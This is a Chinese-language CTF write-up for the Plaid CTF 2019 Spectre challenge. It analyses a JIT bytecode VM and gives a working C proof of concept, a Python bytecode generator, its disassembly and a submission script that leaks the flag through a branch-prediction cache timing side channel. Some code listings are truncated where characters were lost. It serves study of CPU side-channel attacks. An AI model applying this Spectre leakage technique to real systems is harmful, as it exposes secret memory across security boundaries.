Plaid CTF 2019 Spectre writeup 发表于 2019-04-18 | 分类于 漏洞利用 | 暂无评论 这个题考察的是在2018年1月公布的关于CPU分支预测的Spectre漏洞,具体细节可以看[https://spectreattack.com/spectre.pdf](https://spectreattack.com/spectre.pdf) 题目给了一个[binary](https://drive.google.com/open?id=1THs2TpjxaHiwDRFhgUq5FE42RlrRyn7b),逻辑很简单 ```c int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ebx __int64 *v4; // rax __int64 *v5; // rbp __int64 v6; // rdx v3 = 1; v4 = calloc(1uLL, 0x1030uLL); if ( argc > 1 ) { v5 = v4; v3 = 2; if ( load_flag(v4, argv[1]) ) { v3 = 3; if ( fread(v5, 8uLL, 1uLL, stdin) == 1 && *v5 <= 0x1000 ) { v3 = 4; if ( *v5 == __fread_chk(v5 + 1, 0x1028LL, 1LL, *v5, stdin) ) { v3 = 5; if ( mmap(0x133700000000LL, 0x400000uLL, 3, 34, -1, 0LL) != -1LL ) { v3 = 6; if ( mmap(0x414100000000LL, 0x2000000uLL, 3, 34, -1, 0LL) != -1LL ) { v3 = 7; memset(0x133700000000LL, 0xCC, 0x400000uLL); if ( jit(v5) ) { v3 = mprotect(0x133700000000LL, 0x400000uLL, 5); if ( v3 ) { v3 = 8; } else { signal(14, alarm_handler); alarm(0xAu); the_vm = v5; v5[513] = builtin_bc; v5[514] = builtin_time; v5[515] = rdtsc(0, v6); MEMORY[0x133700000000](); alarm(0); fwrite(0x414100000000LL, 1uLL, 0x1000uLL, _bss_start); } } } } } } } } return v3; } ``` 程序先通过`load_flag`函数把flag读到`calloc`申请的buffer的第`0x1020`往后的内存中,同时程序还有如下的校验,我们在分析完程序后没有发现有什么漏洞可以绕过这个校验,因此根据题意需要我们通过`Spectre`漏洞来泄露flag ```c ... fread(v5, 8uLL, 1uLL, stdin) == 1 && *v5 <= 0x1000 ... __int64 __fastcall builtin_bc(unsigned __int64 a1) { __int64 result; // rax result = -1LL; if ( *the_vm > a1 ) result = *(the_vm + a1 + 8); return result; } ``` 程序会读取一段bytecode,然后通过`jit`函数生成x86_64指令执行,但是这里能生成的x86_64指令非常有限,仅有如下几种 ### encode_prologue ``` push rsi push rdi push rbp push r8 push r9 push r10 push r11 push r12 push r13 push r14 push r15 movabs rsi,0x133700000000 movabs rdi,0x414100000000 movabs rbp,buf+0x1008 ``` ### encode_epilogue opcode:0 ``` pop r15 pop r14 pop r13 pop r12 pop r11 pop r10 pop r9 pop r8 pop rbp pop rdi pop rsi ``` ### encode_add opcode:1 ``` movsxd r8-r15, r8d-r15d ``` ### encode_add opcode:2 ``` add r8-r15, r8-r15 ``` ### encode_sub opcode:3 ``` sub r8-r15, r8-r15 ``` ### encode_and opcode:4 ``` and r8-r15, r8-r15 ``` ### encode_shl opcode:5 ``` mov cl, r8b-r15b shl r8-r15, cl ``` ### encode_shr opcode:6 ``` mov cl, r8b-r15b shr r8-r15, cl ``` ### encode_move opcode:7 ``` mov r8-r15, r8-r15 ``` ### encode_movc opcode:8 ``` mov r8-r15, int32 ``` ### encode_load opcode:9 ``` mov eax, r8d-r15d mov r8-r15, QWORD PTR [rdi+rax*1] ``` ### encode_store opcode:10 ``` mov eax,r8d-r15d mov QWORD PTR [rdi+rax*1], r8-r15 ``` ### encode_builtin opcode:11 ``` push rdi push rsi push r8-r11 mov edi,r8d mov esi,r9d mov edx,r10d mov ecx,r11d call QWORD PTR [rbp+xxx] pop r11-r8 pop rsi pop rdi mov r8-r15, rax ``` ### encode_loop opcode:12 ``` mov rax, int32 cmp r8-r15, rax jle xxx ``` 这里的`jle`只能往低地址跳 这题由我和另外两个队友一起完成,我们的思路是先根据题目的上下文用C语言实现一个可以成功泄露的版本,大致如下 ```c #include #include #include #include #include #include #include #include char *the_vm; uint8_t restrictedAccess(size_t x) { if (x < *(unsigned long*)the_vm) { return the_vm[x+8]; } else { return 0; } } int main(int arg, char **argv) { FILE *in = fopen(argv[1], "r"); char line[0x20]; fgets(line, 0x20, in); char *vm = calloc(0x1, 0x1030); memcpy(&vm[0x1020], line, strlen(line)); *(unsigned long*)vm = 0x1000; char *code = mmap((void *)0x133700000000, 0x400000, 3, 34, -1, 0); char *addr = mmap((void *)0x414100000000, 0x2000000, 3, 34, -1, 0); memset((void *)0x133700000000, 0xCC, 0x400000); the_vm = vm; size_t larger_x = 0x1018; int i; uint8_t s; for (i = 0; i < 0x100; i++) { addr[i*4096] = 1; } int ch = 0; int count = 0; while (1) { for (i = 0; i < 66; i++) { restrictedAccess(i); } for (i = 0x800000; i < 2*0x800000; i++) { addr[i] = 1; } s = restrictedAccess(larger_x); addr[s*4096] = 88; int junk=0; uint64_t time1, time2; char *addr2; int cnt = 0; int res = 0; for (i = 0x20; i < 0x80; i++){ addr2 = &addr[i*4096]; time1 = __rdtscp(&junk); junk = *addr2; time2 = __rdtscp(&junk) - time1; *(unsigned long *)(0x414100000000 + i*8) = time2; } unsigned long min = -1; for (i = 0x20; i < 0x80; i++) { unsigned long tmp = *(unsigned long *)(0x414100000000 + i*8); if (tmp < min) { ch = i; min = tmp; } } if (min < 60) break; count++; } printf("%c, %d\n", ch, count); fwrite((const void *)0x414100000000, 1, 0x1000, stdout); return 0; } ``` 上面的`restrictedAccess`函数模拟了题目中的`builtin_bc`,只是题目中判断失败会返回`-1`。第`46-48`行的循环是为了训练CPU的分支预测,使第`54`行再次执行时会预测执行`if`中的指令,这样通过后续`addr[s*4096] = 88`写操作让CPU中有缓存,再在`62-68`行的循环中根据访问时间来判断是否命中了缓存,以此来进行信息泄露。为了准确地判断是否命中缓存还需要先清空缓存,paper中使用了`clflush`指令清空缓存,但是在题目中我们没有找到方法调用`clflush`指令,然后我通过`50-52`行的写操作来清空缓存,最后经过测试当访问时间的计数小于`60`时结果比较准确,每个字符大概在100次以内能够跑出来。 C语言实现后再把它转成bytecode ```python from pwn import * import struct context.arch = 'amd64' context.log_level = 'critical' payload = '' bc = '' def encode_prologue(bc): bc += '\x56\x57\x55' for i in range(0, 8): bc = push_reg(bc, i) bc = mov_reg_const64(bc, 0x16, 0x133700000000) bc = mov_reg_const64(bc, 0x17, 0x414100000000) bc = mov_reg_const64(bc, 0x15, 0x666600000000 + 0x1008) return bc def push_reg(bc, reg): if reg > 0xf: reg = reg - 0x10 else: bc += chr(0x41) bc += chr(reg | 0x50) return bc def mov_reg_const64(bc, reg, val): if reg > 0xf: bc += chr(0x48) bc += chr((reg - 0x10) | 0xb8) bc += struct.pack(' 0xf: reg = reg - 0x10 else: bc += chr(0x41) bc += chr(reg | 0x58) return bc def cdq(reg, bc): global payload start = len(bc) bc += '\x4d\x63' + chr(((8 * (reg & 7)) | (reg >> 3) & 7 | 0xC0)) payload += '\x01' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def add(reg, bc): global payload start = len(bc) bc += '\x4d\x01' + chr(reg | 0xC0) payload += '\x02' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def sub(reg, bc): global payload start = len(bc) bc += '\x4d\x29' + chr(reg | 0xC0) payload += '\x03' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def my_and(reg, bc): global payload start = len(bc) bc += '\x4d\x21' + chr(reg | 0xC0) payload += '\x04' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def shl(reg, bc): global payload start = len(bc) bc += '\x44\x88' + chr(reg & 0x38 | 0xC1) + '\x49\xd3' + chr(reg & 7 | 0xE0) payload += '\x05' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def shr(reg, bc): bc += '\x44\x88' + chr(reg & 0x38 | 0xC1) + '\x49\xd3' + chr(reg & 7 | 0xE8) return bc def mov(reg, bc): global payload start = len(bc) bc += '\x4d\x89' + chr(reg | 0xC0) payload += '\x07' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def movc(reg, val, bc): global payload start = len(bc) bc = mov_reg_const(bc, reg & 7, val) payload += '\x08' + chr(reg) + struct.pack(' 0xf: bc += '\x48\xc7' reg -= 0x10 else: bc += '\x49\xc7' bc += chr(reg | 0xC0) bc += struct.pack('> 3) & 7) bc += '\x4c\x8b' + chr(8 * (reg & 7) + 4) + '\x07' payload += '\x09' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def mov_reg_reg(bc, reg1, reg2): if reg1 <= 0xf or reg2 > 8: exit(-1) bc += '\x44\x89' bc += chr((reg1 - 0x10) | (8 * reg2) | 0xC0) return bc def store(reg, bc): global payload start = len(bc) bc = mov_reg_reg(bc, 0x10, reg & 7) bc += '\x4c\x89' + chr(reg & 0x38 | 4) + '\x07' payload += '\x0a' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def builtin(reg, bc): global payload start = len(bc) if ((reg >> 3) & 7) <= 1: bc += '\x57\x56' for i in range(0, 4): bc = push_reg(bc, i) bc += '\x44\x89\xc7\x44\x89\xce\x44\x89\xd2\x44\x89\xd9\xff\x55' + chr((8 * ((reg >> 3) & 7))) for i in range(3, -1, -1): bc = pop_reg(bc, i) bc += '\x5e\x5f\x49\x89' + chr(reg & 7 | 0xC0) payload += '\x0b' + chr(reg) # print "%d: %s" % (start, disasm(bc[start:len(bc)])) return bc def loop(reg, val, pos, bc): global payload start = len(bc) bc = mov_reg_const(bc, 0x10, val) bc += '\x49\x39' + chr(((reg >> 3) & 7) | 0xC0) + '\x0f\x8e' + struct.pack(' data[i]: min_time = data[i] ch = i count += 1 if min_time < 60: print 'idx:', idx, 'Yeah:', chr(ch+0x20) print 'idx:', idx, 'count:', count break ``` 生成的x86_64指令如下 ``` 0: 56 push rsi 1: 57 push rdi 2: 55 push rbp 3: 41 50 push r8 5: 41 51 push r9 7: 41 52 push r10 9: 41 53 push r11 b: 41 54 push r12 d: 41 55 push r13 f: 41 56 push r14 11: 41 57 push r15 13: 48 be 00 00 00 00 37 movabs rsi,0x133700000000 1a: 13 00 00 1d: 48 bf 00 00 00 00 41 movabs rdi,0x414100000000 24: 41 00 00 27: 48 bd 08 10 00 00 66 movabs rbp,0x666600001008 2e: 66 00 00 31: 49 c7 c0 00 00 00 00 mov r8,0x0 38: 49 c7 c1 00 10 00 00 mov r9,0x1000 3f: 49 c7 c2 01 00 00 00 mov r10,0x1 46: 49 c7 c3 00 00 00 00 mov r11,0x0 4d: 44 89 d8 mov eax,r11d 50: 4c 89 14 07 mov QWORD PTR [rdi+rax*1],r10 54: 4d 01 cb add r11,r9 57: 4d 01 d0 add r8,r10 5a: 48 c7 c0 ff 00 00 00 mov rax,0xff 61: 49 39 c0 cmp r8,rax 64: 0f 8e e3 ff ff ff jle 0x4d 6a: 49 c7 c0 00 00 00 00 mov r8,0x0 71: 57 push rdi 72: 56 push rsi 73: 41 50 push r8 75: 41 51 push r9 77: 41 52 push r10 79: 41 53 push r11 7b: 44 89 c7 mov edi,r8d 7e: 44 89 ce mov esi,r9d 81: 44 89 d2 mov edx,r10d 84: 44 89 d9 mov ecx,r11d 87: ff 55 00 call QWORD PTR [rbp+0x0] 8a: 41 5b pop r11 8c: 41 5a pop r10 8e: 41 59 pop r9 90: 41 58 pop r8 92: 5e pop rsi 93: 5f pop rdi 94: 49 89 c7 mov r15,rax 97: 4d 01 d0 add r8,r10 9a: 48 c7 c0 41 00 00 00 mov rax,0x41 a1: 49 39 c0 cmp r8,rax a4: 0f 8e c7 ff ff ff jle 0x71 aa: 49 c7 c0 00 00 80 00 mov r8,0x800000 b1: 44 89 c0 mov eax,r8d b4: 4c 89 14 07 mov QWORD PTR [rdi+rax*1],r10 b8: 4d 01 d0 add r8,r10 bb: 48 c7 c0 ff ff 7f 01 mov rax,0x17fffff c2: 49 39 c0 cmp r8,rax c5: 0f 8e e6 ff ff ff jle 0xb1 cb: 49 c7 c0 18 10 00 00 mov r8,0x1018 d2: 49 c7 c4 0c 00 00 00 mov r12,0xc d9: 49 c7 c5 66 66 00 00 mov r13,0x6666 e0: 49 c7 c6 ff 00 00 00 mov r14,0xff e7: 57 push rdi e8: 56 push rsi e9: 41 50 push r8 eb: 41 51 push r9 ed: 41 52 push r10 ef: 41 53 push r11 f1: 44 89 c7 mov edi,r8d f4: 44 89 ce mov esi,r9d f7: 44 89 d2 mov edx,r10d fa: 44 89 d9 mov ecx,r11d fd: ff 55 00 call QWORD PTR [rbp+0x0] 100: 41 5b pop r11 102: 41 5a pop r10 104: 41 59 pop r9 106: 41 58 pop r8 108: 5e pop rsi 109: 5f pop rdi 10a: 49 89 c7 mov r15,rax 10d: 4d 21 f7 and r15,r14 110: 44 88 e1 mov cl,r12b 113: 49 d3 e7 shl r15,cl 116: 44 89 f8 mov eax,r15d 119: 4c 89 2c 07 mov QWORD PTR [rdi+rax*1],r13 11d: 49 c7 c0 20 00 00 00 mov r8,0x20 124: 4d 89 c3 mov r11,r8 127: 44 88 e1 mov cl,r12b 12a: 49 d3 e3 shl r11,cl 12d: 57 push rdi 12e: 56 push rsi 12f: 41 50 push r8 131: 41 51 push r9 133: 41 52 push r10 135: 41 53 push r11 137: 44 89 c7 mov edi,r8d 13a: 44 89 ce mov esi,r9d 13d: 44 89 d2 mov edx,r10d 140: 44 89 d9 mov ecx,r11d 143: ff 55 08 call QWORD PTR [rbp+0x8] 146: 41 5b pop r11 148: 41 5a pop r10 14a: 41 59 pop r9 14c: 41 58 pop r8 14e: 5e pop rsi 14f: 5f pop rdi 150: 49 89 c6 mov r14,rax 153: 44 89 d8 mov eax,r11d 156: 4c 8b 3c 07 mov r15,QWORD PTR [rdi+rax*1] 15a: 57 push rdi 15b: 56 push rsi 15c: 41 50 push r8 15e: 41 51 push r9 160: 41 52 push r10 162: 41 53 push r11 164: 44 89 c7 mov edi,r8d 167: 44 89 ce mov esi,r9d 16a: 44 89 d2 mov edx,r10d 16d: 44 89 d9 mov ecx,r11d 170: ff 55 08 call QWORD PTR [rbp+0x8] 173: 41 5b pop r11 175: 41 5a pop r10 177: 41 59 pop r9 179: 41 58 pop r8 17b: 5e pop rsi 17c: 5f pop rdi 17d: 49 89 c7 mov r15,rax 180: 4d 29 f7 sub r15,r14 183: 4d 89 c3 mov r11,r8 186: 49 c7 c5 03 00 00 00 mov r13,0x3 18d: 44 88 e9 mov cl,r13b 190: 49 d3 e3 shl r11,cl 193: 44 89 d8 mov eax,r11d 196: 4c 89 3c 07 mov QWORD PTR [rdi+rax*1],r15 19a: 4d 01 d0 add r8,r10 19d: 48 c7 c0 7f 00 00 00 mov rax,0x7f 1a4: 49 39 c0 cmp r8,rax 1a7: 0f 8e 77 ff ff ff jle 0x124 1ad: 41 5f pop r15 1af: 41 5e pop r14 1b1: 41 5d pop r13 1b3: 41 5c pop r12 1b5: 41 5b pop r11 1b7: 41 5a pop r10 1b9: 41 59 pop r9 1bb: 41 58 pop r8 1bd: 5d pop rbp 1be: 5f pop rdi 1bf: 5e pop rsi 1c0: c3 ret ``` bytecode只能在网站上提交 ![][1] 因此还写了一个提交的脚本 ```python import requests import subprocess import sys idx = int(sys.argv[1]) while True: answer = subprocess.check_output(['hashcash', '-m', '-b', '28', '-r', 'spectre']) # print answer[:-1] data = { 'pow': answer[:-1], 'submit': 'Upload' } files = { 'script' : ('payload', open("./payload_%d" % idx, "rb"), 'application/octet-stream') } req = requests.post('http://spectre.pwni.ng:4000', data, files=files, allow_redirects=True) text = req.history[0].text # print text start = text.find('/') url = text[start:end] # print url req = requests.get('http://spectre.pwni.ng:4000%s' % url) text = req.text # print text lines = text.split('\n') times = [] for i in range(35, 83): nums = lines[i].split(' ') times.append(int(nums[0], 16)) times.append(int(nums[2], 16)) # print times min_time = 0xffffffff ch = '' for i in range(0, len(times)): if times[i] < min_time: min_time = times[i] ch = i + 0x20 print 'idx:', idx, 'min_time:', min_time if min_time < 60: print 'idx:', idx, 'Yeah:', chr(ch) break else: print 'idx:', idx, 'failed:', chr(ch) ``` 由于要计算`hashcash`,因此放在了一台56核的机器上跑,几分钟后就跑出了flag`pctf{CPU2h4rd!}` [1]: http://static.zybuluo.com/birdg0/9wahcg9orznwqodqlokf1toj/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202019-04-18%20%E4%B8%8B%E5%8D%888.13.51.png